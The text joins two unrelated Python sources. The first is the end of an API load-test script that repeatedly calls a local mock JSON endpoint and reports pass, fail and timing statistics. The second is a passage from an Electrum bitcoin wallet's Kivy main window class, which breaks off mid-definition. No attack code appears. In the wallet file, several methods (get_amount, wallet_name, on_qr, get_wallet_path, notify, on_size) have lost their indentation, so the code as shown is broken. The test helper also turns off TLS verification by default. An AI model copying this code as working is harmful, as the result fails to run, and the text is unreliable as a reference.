    # Then run the tests.
    def test_mock_service(self):
        """GET the local mock endpoint and validate its JSON "code" field.

        :return: ('pass'|'fail'|'exception', elapsed_seconds_or_None)
        """
        log.info('Calling %s.' % inspect.stack()[0][3])
        url = r'http://127.0.0.1:5000/json'
        resp = self.get(url)
        # Functional-test asserts are converted to branches so a single failure
        # does not stop the performance run.
        if resp is None:
            log.error('Test %s failed with exception.' % inspect.stack()[0][3])
            return 'exception', None
        elif resp.status_code != 200:
            # fixed typo: was `inpsect`, which raised NameError on this branch
            log.error('Test %s failed with response status code %s.' % (inspect.stack()[0][3], resp.status_code))
            return 'fail', resp.elapsed.total_seconds()
        elif resp.json()["code"] != 1:
            log.error('Test %s failed with code %s != 1.' % (inspect.stack()[0][3], resp.json()["code"]))
            return 'fail', resp.elapsed.total_seconds()
        else:
            log.info('Test %s passed.' % inspect.stack()[0][3])
            return 'pass', resp.elapsed.total_seconds()
        """ json response
        {
        "code": 1,
        "message": "Hello, World!"
        }
        """

    def loop_test(self, loop_wait=0, loop_times=sys.maxsize):
        """
        loop test of some APIs for performance test purpose.
        Parameters:
            loop_wait   wait time between two loops.
            loop_times  number of loops, default indefinite
        """
        looped_times = 0
        while (looped_times < loop_times
               and not self.event_time_up.is_set()
               and not self.event_test_done.is_set()):
            # APIs to test
            # API - test_mock_service:
            test_result, elapsed_time = self.test_mock_service()
            # put results into a queue for statistics
            self.queue_results.put(['test_mock_service', test_result, elapsed_time])
            # # API - test_post_headers_body_json:
            # test_result, elapsed_time = self.test_post_headers_body_json()
            # self.queue_results.put(['test_post_headers_body_json', test_result, elapsed_time])
            looped_times += 1
            sleep(loop_wait)

    def stats(self):
        """Drain the results queue, update cumulative statistics, and print them."""
        end_time = time.time()
        # get the approximate queue size
        qsize = self.queue_results.qsize()
        drained = 0
        for _ in range(qsize):
            try:
                result = self.queue_results.get_nowait()
            except queue.Empty:
                # was bare `Empty` (a NameError); qsize() is only approximate,
                # so the queue can run dry before the loop finishes.
                break
            drained += 1
            # calc stats
            if result[1] == 'exception':
                self.total_exception_requests += 1
            elif result[1] == 'fail':
                self.total_fail_requests += 1
            elif result[1] == 'pass':
                self.total_pass_requests += 1
                # response-time stats only apply to passing requests
                # (exception entries carry elapsed_time=None)
                self.sum_response_time += result[2]
                if result[2] < self.tpr_min:
                    self.tpr_min = result[2]
                if result[2] > self.tpr_max:
                    self.tpr_max = result[2]
        self.total_tested_requests += drained
        # time per request mean (avg)
        if self.total_pass_requests != 0:
            self.tpr_mean = self.sum_response_time / self.total_pass_requests
        # requests per second
        if self.start_time == 0:
            log.error('stats: self.start_time is not set, skipping rps stats.')
        else:
            # calc the tested time so far.
            tested_time = end_time - self.start_time
            self.rps_mean = self.total_pass_requests / tested_time
        # print stats
        print('\n-----------------Test Statistics---------------')
        print(time.asctime())
        print('Total requests: %s, pass: %s, fail: %s, exception: %s'
              % (self.total_tested_requests, self.total_pass_requests, self.total_fail_requests, self.total_exception_requests)
              )
        if self.total_pass_requests > 0:
            print('For pass requests:')
            print('Request per Second - mean: %.2f' % self.rps_mean)
            print('Time per Request - mean: %.6f, min: %.6f, max: %.6f'
                  % (self.tpr_mean, self.tpr_min, self.tpr_max)
                  )

    def loop_stats(self, interval=60):
        """ print stats in an interval(secs) continunously
        Run this as a separate thread so it won't block the main thread.
        """
        while (not self.event_time_up.is_set()
               and not self.event_test_done.is_set()):
            sleep(interval)
            self.stats()

    def set_event_time_up(self):
        """ set the time up flag """
        if not self.event_time_up.is_set():
            self.event_time_up.set()
            self.event_test_done.set()

    def set_event_test_done(self):
        """ set the test done flag either normally or by interruption """
        if not self.event_test_done.is_set():
            self.event_test_done.set()

    def start_timer(self, timeout):
        """ set a timer to stop testing """
        self.timer = Timer(timeout, self.set_event_time_up)
        self.timer.start()

    def cancel_timer(self):
        """ cancel the timer if test loop_times is reached first. """
        if self.timer is not None and not self.event_time_up.is_set():
            self.timer.cancel()

    def post(self, url, data, headers={}, verify=True, amend_headers=True):
        """
        common request post function with below features, which you only need to take care of url and body data:
            - append common headers
            - print request and response in API log file
            - Take care of request exception and non-200 response codes and return None, so you only need to care normal json response.
            - arguments are the same as requests.post, except amend_headers.

        verify: False - Disable SSL certificate verification
        Return: None for exception
        """
        # copy so neither the caller's dict nor the shared default is mutated
        # (the original aliased and then wrote into `headers`)
        headers_new = dict(headers)
        if amend_headers:
            if 'Content-Type' not in headers_new:
                headers_new['Content-Type'] = r'application/json'
            if 'User-Agent' not in headers_new:
                headers_new['User-Agent'] = 'Python Requests'
        # send post request
        try:
            resp = requests.post(url, data=data, headers=headers_new, verify=verify)
        except Exception as ex:
            # was log.error(msg, str(ex)) with no %s placeholder, which
            # produced a logging formatting error instead of the message
            log.error('requests.post() failed with exception: %s', ex)
            return None
        # pretty request and response into API log file
        # Note: request print is common instead of checking if it is JSON body. So pass pretty formatted json string as argument to the request for pretty logging.
        pretty_print_request(resp.request)
        pretty_print_response_json(resp)
        log_api.debug('response time in seconds: ' + str(resp.elapsed.total_seconds()) + '\n')
        return resp

    def get(self, url, auth=None, verify=False):
        """
        common request get function with below features, which you only need to take care of url:
            - print request and response in API log file
            - Take care of request exception and non-200 response codes and return None, so you only need to care normal json response.
            - arguments are the same as requests.get

        verify: False - Disable SSL certificate verification
        Return: None for exception
        """
        try:
            if auth is None:
                resp = requests.get(url, verify=verify)
            else:
                resp = requests.get(url, auth=auth, verify=verify)
        except Exception as ex:
            # same placeholder fix as in post()
            log.error('requests.get() failed with exception: %s', ex)
            return None
        # pretty request and response into API log file
        pretty_print_request(resp.request)
        pretty_print_response_json(resp)
        log_api.debug('response time in seconds: ' + str(resp.elapsed.total_seconds()) + '\n')
        return resp
def main():
    """Run the performance test: spawn user threads, collect stats, report totals."""
    ### Test Settings ###
    concurrent_users = 10
    # test stops whenever loop_times or test_time is met first.
    loop_times = 30
    test_time = 3600  # time in seconds, e.g. 36000
    stats_interval = 2
    ramp_up = 0  # total time in secs to ramp up. default 0, no wait
    perf_test = TestAPI()
    workers = []
    start_time = time.time()
    perf_test.start_time = start_time
    print('Tests started at %s.' % time.asctime())
    # start stats thread
    stats_thread = Thread(target=perf_test.loop_stats, args=[stats_interval], daemon=True)
    stats_thread.start()
    # start concurrent user threads
    for i in range(concurrent_users):
        thread = Thread(target=perf_test.loop_test, kwargs={'loop_times': loop_times}, daemon=True)
        thread.start()
        workers.append(thread)
        # ramp up: stagger thread starts across the ramp_up window.
        # (The original slept once AFTER all threads had already started,
        # so the ramp-up never actually staggered anything.)
        sleep(ramp_up / concurrent_users)
    # start timer
    perf_test.start_timer(test_time)
    # Block until all threads finish.
    for w in workers:
        w.join()
    # clean up
    # stop timer if loop_times is reached first.
    perf_test.cancel_timer()
    end_time = time.time()
    perf_test.end_time = end_time
    # Ensure to execute the last statistics:
    perf_test.stats()
    print('\nTests ended at %s.\nTotal test time: %s seconds.' % (time.asctime(), end_time - start_time))
if __name__ == '__main__':
    # Entry point: run the full performance test.
    main()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
# NOTE(review): this import rebinds `Label` (previously kivy.uix.label.Label)
# to the core-text Label so the font can be registered.
from kivy.core.text import Label
Label.register('Roboto',
               'gui/kivy/data/fonts/Roboto.ttf',
               'gui/kivy/data/fonts/Roboto.ttf',
               'gui/kivy/data/fonts/Roboto-Bold.ttf',
               'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
    """Main Kivy application window for the Electrum wallet GUI."""
    electrum_config = ObjectProperty(None)
    language = StringProperty('en')
    # properties might be updated by the network
    num_blocks = NumericProperty(0)
    num_nodes = NumericProperty(0)
    server_host = StringProperty('')
    server_port = StringProperty('')
    num_chains = NumericProperty(0)
    blockchain_name = StringProperty('')
    blockchain_checkpoint = NumericProperty(0)
    auto_connect = BooleanProperty(False)
    def on_auto_connect(self, instance, x):
        # Push the toggled auto_connect value into the network layer, keeping
        # the other connection parameters unchanged.
        host, port, protocol, proxy, auto_connect = self.network.get_parameters()
        self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
    def toggle_auto_connect(self, x):
        self.auto_connect = not self.auto_connect
    def choose_server_dialog(self, popup):
        """Open a ChoiceDialog of known servers; the selection fills the popup's host/port fields."""
        from .uix.dialogs.choice_dialog import ChoiceDialog
        # 's' protocol — presumably the SSL transport; confirm against electrum defaults
        protocol = 's'
        def cb2(host):
            from electrum.bitcoin import NetworkConstants
            pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
            port = pp.get(protocol, '')
            popup.ids.host.text = host
            popup.ids.port.text = port
        servers = self.network.get_servers()
        ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
    def choose_blockchain_dialog(self, dt):
        """Let the user pick a chain when the network reports multiple blockchains."""
        from .uix.dialogs.choice_dialog import ChoiceDialog
        chains = self.network.get_blockchains()
        def cb(name):
            for index, b in self.network.blockchains.items():
                if name == self.network.get_blockchain_name(b):
                    self.network.follow_chain(index)
            #self.block
        names = [self.network.blockchains[b].get_name() for b in chains]
        if len(names) >1:
            ChoiceDialog(_('Choose your chain'), names, '', cb).open()
    use_rbf = BooleanProperty(False)
    def on_use_rbf(self, instance, x):
        # persist the replace-by-fee preference
        self.electrum_config.set_key('use_rbf', self.use_rbf, True)
    use_change = BooleanProperty(False)
    def on_use_change(self, instance, x):
        self.electrum_config.set_key('use_change', self.use_change, True)
    use_unconfirmed = BooleanProperty(False)
    def on_use_unconfirmed(self, instance, x):
        # stored inverted: the config key is 'confirmed_only'
        self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
    def set_URI(self, uri):
        """Switch to the send tab and populate it from a bitcoin: URI."""
        self.switch_to('send')
        self.send_screen.set_URI(uri)
    def on_new_intent(self, intent):
        # Android intent handler for the bitcoin: URI scheme.
        if intent.getScheme() != 'bitcoin':
            return
        uri = intent.getDataString()
        self.set_URI(uri)
    def on_language(self, instance, language):
        Logger.info('language: {}'.format(language))
        _.switch_lang(language)
    def update_history(self, *dt):
        if self.history_screen:
            self.history_screen.update()
    def on_quotes(self, d):
        Logger.info("on_quotes")
        self._trigger_update_history()
    def on_history(self, d):
        Logger.info("on_history")
        self._trigger_update_history()
    def _get_bu(self):
        # base unit defaults to mBTC
        return self.electrum_config.get('base_unit', 'mBTC')
    def _set_bu(self, value):
        assert value in base_units.keys()
        self.electrum_config.set_key('base_unit', value, True)
        self._trigger_update_status()
        self._trigger_update_history()
    base_unit = AliasProperty(_get_bu, _set_bu)
    status = StringProperty('')
    fiat_unit = StringProperty('')
    def on_fiat_unit(self, a, b):
        self._trigger_update_history()
    def decimal_point(self):
        # number of decimal places implied by the selected base unit
        return base_units[self.base_unit]
    def btc_to_fiat(self, amount_str):
        """Convert a BTC amount string (in the current base unit) to fiat text; '' when no rate."""
        if not amount_str:
            return ''
        rate = self.fx.exchange_rate()
        if not rate:
            return ''
        fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
        return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
    def fiat_to_btc(self, fiat_amount):
        """Convert a fiat amount string to a plain-formatted satoshi amount; '' when no rate."""
        if not fiat_amount:
            return ''
        rate = self.fx.exchange_rate()
        if not rate:
            return ''
        satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
        return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
    _orientation = OptionProperty('landscape',
                                  options=('landscape', 'portrait'))
    def _get_orientation(self):
        return self._orientation
    orientation = AliasProperty(_get_orientation,
                                None,
                                bind=('_orientation',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.

    :data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
    '''
    _ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
    def _get_ui_mode(self):
        return self._ui_mode
    ui_mode = AliasProperty(_get_ui_mode,
                            None,
                            bind=('_ui_mode',))
    '''Defines tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.

    :data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
    '''
    def __init__(self, **kwargs):
        """Wire up state from kwargs (config, network, plugins, gui_object).

        Heavy initialization (wallet loading, UI build) happens later in
        on_start(); this only sets attributes and Clock triggers.
        """
        # initialize variables
        self._clipboard = Clipboard
        self.info_bubble = None
        self.nfcscanner = None
        self.tabs = None
        self.is_exit = False
        self.wallet = None
        App.__init__(self)#, **kwargs)
        title = _('Electrum App')
        self.electrum_config = config = kwargs.get('config', None)
        self.language = config.get('language', 'en')
        self.network = network = kwargs.get('network', None)
        if self.network:
            self.num_blocks = self.network.get_local_height()
            self.num_nodes = len(self.network.get_interfaces())
            host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
            self.server_host = host
            self.server_port = port
            self.auto_connect = auto_connect
            self.proxy_config = proxy_config if proxy_config else {}
        self.plugins = kwargs.get('plugins', [])
        self.gui_object = kwargs.get('gui_object', None)
        self.daemon = self.gui_object.daemon
        self.fx = self.daemon.fx
        self.use_rbf = config.get('use_rbf', True)
        self.use_change = config.get('use_change', True)
        self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so as to minimize updation a max of 2 times a sec
        self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
        self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
        self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
        self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
        # cached dialogs
        self._settings_dialog = None
        self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
    def on_pr(self, pr):
        """Handle an incoming payment request: verify, store, and route to the send tab."""
        if pr.verify(self.wallet.contacts):
            key = self.wallet.invoices.add(pr)
            if self.invoices_screen:
                self.invoices_screen.update()
            status = self.wallet.invoices.get_status(key)
            if status == PR_PAID:
                self.show_error("invoice already paid")
                self.send_screen.do_clear()
            else:
                if pr.has_expired():
                    self.show_error(_('Payment request has expired'))
                else:
                    self.switch_to('send')
                    self.send_screen.set_request(pr)
        else:
            self.show_error("invoice error:" + pr.error)
            self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
    def update_tab(self, name):
        # Refresh a single screen by attribute name, if it has been created.
        s = getattr(self, name + '_screen', None)
        if s:
            s.update()
    @profiler
    def update_tabs(self):
        """Refresh every main screen that has been instantiated."""
        for tab in ['invoices', 'send', 'history', 'receive', 'address']:
            self.update_tab(tab)
    def switch_to(self, name):
        """Activate the named tab, lazily creating its screen on first use."""
        s = getattr(self, name + '_screen', None)
        if s is None:
            s = self.tabs.ids[name + '_screen']
            s.load_screen()
        panel = self.tabs.ids.panel
        tab = self.tabs.ids[name + '_tab']
        panel.switch_to(tab)
    def show_request(self, addr):
        """Jump to the receive tab pre-filled with *addr*."""
        self.switch_to('receive')
        self.receive_screen.screen.address = addr
    def show_pr_details(self, req, status, is_invoice):
        """Open the invoice popup populated from a payment-request dict *req*."""
        from electrum.util import format_time
        requestor = req.get('requestor')
        exp = req.get('exp')
        memo = req.get('memo')
        amount = req.get('amount')
        fund = req.get('fund')
        popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
        popup.is_invoice = is_invoice
        popup.amount = amount
        popup.requestor = requestor if is_invoice else req.get('address')
        popup.exp = format_time(exp) if exp else ''
        popup.description = memo if memo else ''
        popup.signature = req.get('signature', '')
        popup.status = status
        popup.fund = fund if fund else 0
        txid = req.get('txid')
        popup.tx_hash = txid or ''
        popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
        popup.export = self.export_private_keys
        popup.open()
    def show_addr_details(self, req, status):
        """Open the invoice popup in address mode for request dict *req*."""
        from electrum.util import format_time
        fund = req.get('fund')
        isaddr = 'y'
        popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
        popup.isaddr = isaddr
        popup.is_invoice = False
        popup.status = status
        popup.requestor = req.get('address')
        popup.fund = fund if fund else 0
        popup.export = self.export_private_keys
        popup.open()
    def qr_dialog(self, title, data, show_text=False):
        """Display *data* as a QR code in a popup dialog."""
        from .uix.dialogs.qr_dialog import QRDialog
        popup = QRDialog(title, data, show_text)
        popup.open()
    def scan_qr(self, on_complete):
        """Launch the Android QR scanner; *on_complete* receives the scanned text.

        No-op on non-Android platforms.
        """
        if platform != 'android':
            return
        from jnius import autoclass, cast
        from android import activity
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
        Intent = autoclass('android.content.Intent')
        intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
        def on_qr_result(requestCode, resultCode, intent):
            if resultCode == -1:  # RESULT_OK:
                # this doesn't work due to some bug in jnius:
                # contents = intent.getStringExtra("text")
                String = autoclass("java.lang.String")
                contents = intent.getStringExtra(String("text"))
                on_complete(contents)
        activity.bind(on_activity_result=on_qr_result)
        PythonActivity.mActivity.startActivityForResult(intent, 0)
    def do_share(self, data, title):
        """Open the Android share chooser with `data` as plain text.

        No-op on non-Android platforms.
        """
        if platform != 'android':
            return
        from jnius import autoclass, cast
        JS = autoclass('java.lang.String')
        Intent = autoclass('android.content.Intent')
        sendIntent = Intent()
        sendIntent.setAction(Intent.ACTION_SEND)
        sendIntent.setType("text/plain")
        sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
        it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
        currentActivity.startActivity(it)
    def build(self):
        """Kivy entry point: build and return the root widget tree from main.kv."""
        return Builder.load_file('gui/kivy/main.kv')
    def _pause(self):
        """Send the app to the background on Android (no-op elsewhere)."""
        if platform == 'android':
            # move activity to back
            from jnius import autoclass
            python_act = autoclass('org.kivy.android.PythonActivity')
            mActivity = python_act.mActivity
            mActivity.moveTaskToBack(True)
    def on_start(self):
        ''' This is the start point of the kivy ui
        '''
        import time
        # NOTE(review): time.clock() was removed in Python 3.8 — this only runs
        # on older interpreters; confirm before upgrading the runtime.
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
        win = Window
        win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
        win.bind(on_key_down=self.on_key_down)
        #win.softinput_mode = 'below_target'
        self.on_size(win, win.size)
        self.init_ui()
        self.load_wallet_by_name(self.electrum_config.get_wallet_path())
        # init plugins
        run_hook('init_kivy', self)
        # fiat currency
        self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
        # default tab
        self.switch_to('history')
        # bind intent for bitcoin: URI scheme
        if platform == 'android':
            from android import activity
            from jnius import autoclass
            PythonActivity = autoclass('org.kivy.android.PythonActivity')
            mactivity = PythonActivity.mActivity
            self.on_new_intent(mactivity.getIntent())
            activity.bind(on_new_intent=self.on_new_intent)
        # connect callbacks
        if self.network:
            interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
            self.network.register_callback(self.on_network_event, interests)
            self.network.register_callback(self.on_quotes, ['on_quotes'])
            self.network.register_callback(self.on_history, ['on_history'])
        # URI passed in config
        uri = self.electrum_config.get('url')
        if uri:
            self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
    def on_wizard_complete(self, instance, wallet):
        """Install-wizard callback: register and display the newly created wallet."""
        if wallet:
            wallet.start_threads(self.daemon.network)
            self.daemon.add_wallet(wallet)
            self.load_wallet(wallet)
        self.on_resume()
    def load_wallet_by_name(self, path):
        """Open the wallet at `path`, or launch the install wizard if it doesn't exist."""
        if not path:
            return
        wallet = self.daemon.load_wallet(path, None)
        if wallet:
            if wallet != self.wallet:
                # replace the currently open wallet
                self.stop_wallet()
                self.load_wallet(wallet)
                self.on_resume()
        else:
            Logger.debug('Electrum: Wallet not found. Launching install wizard')
            storage = WalletStorage(path)
            wizard = Factory.InstallWizard(self.electrum_config, storage)
            wizard.bind(on_wizard_complete=self.on_wizard_complete)
            action = wizard.storage.get_action()
            wizard.run(action)
    def on_stop(self):
        """Kivy shutdown hook: release the open wallet."""
        self.stop_wallet()
    def stop_wallet(self):
        """Detach and stop the current wallet, if any."""
        if self.wallet:
            self.daemon.stop_wallet(self.wallet.storage.path)
            self.wallet = None
    def on_key_down(self, instance, key, keycode, codepoint, modifiers):
        """Handle ctrl-key shortcuts (quit, refresh, tab navigation placeholders)."""
        if 'ctrl' in modifiers:
            # q=24 w=25
            if keycode in (24, 25):
                self.stop()
            elif keycode == 27:
                # r=27
                # force update wallet
                self.update_wallet()
            elif keycode == 112:
                # pageup
                #TODO move to next tab
                pass
            elif keycode == 117:
                # pagedown
                #TODO move to prev tab
                pass
        #TODO: alt+tab_number to activate the particular tab
    def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
        """Handle back (27) with press-twice-to-exit, and swallow the settings key."""
        if key == 27 and self.is_exit is False:
            self.is_exit = True
            self.show_info(_('Press again to exit'))
            return True
        # override settings button
        if key in (319, 282): #f1/settings button on android
            #self.gui.main_gui.toggle_settings(self)
            return True
    def settings_dialog(self):
        """Open the settings dialog (created lazily and reused)."""
        from .uix.dialogs.settings import SettingsDialog
        if self._settings_dialog is None:
            self._settings_dialog = SettingsDialog(self)
        self._settings_dialog.update()
        self._settings_dialog.open()
    def popup_dialog(self, name):
        """Open the named dialog: special-cased for settings/wallets, otherwise a kv popup."""
        if name == 'settings':
            self.settings_dialog()
        elif name == 'wallets':
            from .uix.dialogs.wallets import WalletDialog
            d = WalletDialog()
            d.open()
        else:
            popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
            popup.open()
    @profiler
    def init_ui(self):
        ''' Initialize The Ux part of electrum. This function performs the basic
        tasks of setting up the ui.
        '''
        #from weakref import ref
        self.funds_error = False
        # setup UX
        self.screens = {}
        #setup lazy imports for mainscreen
        Factory.register('AnimatedPopup',
                         module='electrum_gui.kivy.uix.dialogs')
        Factory.register('QRCodeWidget',
                         module='electrum_gui.kivy.uix.qrcodewidget')
        # preload widgets. Remove this if you want to load the widgets on demand
        #Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
        #Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
        # load and focus the ui
        self.root.manager = self.root.ids['manager']
        # tab screens are created lazily by switch_to()
        self.history_screen = None
        self.contacts_screen = None
        self.send_screen = None
        self.invoices_screen = None
        self.receive_screen = None
        self.requests_screen = None
        self.address_screen = None
        self.icon = "icons/electrum.png"
        self.tabs = self.root.ids['tabs']
    def update_interfaces(self, dt):
        """Refresh network-status properties (node/chain counts, checkpoint, server)."""
        self.num_nodes = len(self.network.get_interfaces())
        self.num_chains = len(self.network.get_blockchains())
        chain = self.network.blockchain()
        self.blockchain_checkpoint = chain.get_checkpoint()
        self.blockchain_name = chain.get_name()
        if self.network.interface:
            self.server_host = self.network.interface.host
    def on_network_event(self, event, *args):
        """Network callback: schedule the matching UI refresh trigger(s)."""
        Logger.info('network event: '+ event)
        if event == 'interfaces':
            self._trigger_update_interfaces()
        elif event == 'updated':
            self._trigger_update_wallet()
            self._trigger_update_status()
        elif event == 'status':
            self._trigger_update_status()
        elif event == 'new_transaction':
            self._trigger_update_wallet()
        elif event == 'verified':
            self._trigger_update_wallet()
    @profiler
    def load_wallet(self, wallet):
        """Attach `wallet` as the active wallet and refresh all tabs."""
        self.wallet = wallet
        self.update_wallet()
        # Once GUI has been initialized check if we want to announce something
        # since the callback has been called before the GUI was initialized
        if self.receive_screen:
            self.receive_screen.clear()
        self.update_tabs()
        run_hook('load_wallet', wallet, self)
    def update_status(self, *dt):
        """Recompute the status line: sync state, server lag, or the balance."""
        self.num_blocks = self.network.get_local_height()
        if not self.wallet:
            self.status = _("No Wallet")
            return
        if self.network is None or not self.network.is_running():
            status = _("Offline")
        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            if not self.wallet.up_to_date or server_height == 0:
                status = _("Synchronizing...")
            elif server_lag > 1:
                status = _("Server lagging ({} blocks)").format(server_lag)
            else:
                # confirmed, unconfirmed, unmatured
                c, u, x = self.wallet.get_balance()
                text = self.format_amount(c+x+u)
                status = str(text.strip() + ' ' + self.base_unit)
        else:
            status = _("Disconnected")
        n = self.wallet.basename()
        self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
        #fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
    def get_max_amount(self):
        """Return the max spendable amount (all coins, '!' output) as a plain string."""
        inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
        # empty address string is falsy -> fall back to a dummy address
        addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
        outputs = [(TYPE_ADDRESS, addr, '!')]
        tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
        amount = tx.output_value()
        return format_satoshis_plain(amount, self.decimal_point())
    def format_amount(self, x, is_diff=False, whitespaces=False):
        """Format a satoshi amount using the configured decimal point."""
        return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
    def format_amount_and_units(self, x):
        """Format a satoshi amount followed by the configured unit label."""
        return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
    #@profiler
    def update_wallet(self, *dt):
        """Refresh status, and the tabs when the wallet is up to date (or offline)."""
        self._trigger_update_status()
        if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
            self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
    def on_pause(self):
        """Kivy pause hook: disable NFC while backgrounded."""
        # pause nfc
        if self.nfcscanner:
            self.nfcscanner.nfc_disable()
        return True
    def on_resume(self):
        """Kivy resume hook: re-enable NFC and force a display refresh."""
        if self.nfcscanner:
            self.nfcscanner.nfc_enable()
        # workaround p4a bug:
        # show an empty info bubble, to refresh the display
        self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
    def on_ref_label(self, label, touch):
        """First tap copies the label's data; a second tap shows it as a QR code."""
        if label.touched:
            label.touched = False
            self.qr_dialog(label.name, label.data, True)
        else:
            label.touched = True
            self._clipboard.copy(label.data)
            Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
    def set_send(self, address, amount, label, message):
        """Forward payment parameters to send_payment."""
        self.send_payment(address, amount=amount, label=label, message=message)
    def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
        exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
        modal=False):
        ''' Show a error Message Bubble.
        '''
        self.show_info_bubble( text=error, icon=icon, width=width,
            pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
            duration=duration, modal=modal)
    def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
        exit=False, duration=0, modal=False):
        ''' Show a Info Message Bubble.
        '''
        # same bubble as show_error but with the "important" icon
        self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
            duration=duration, modal=modal, exit=exit, pos=pos,
            arrow_pos=arrow_pos)
    def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
        arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
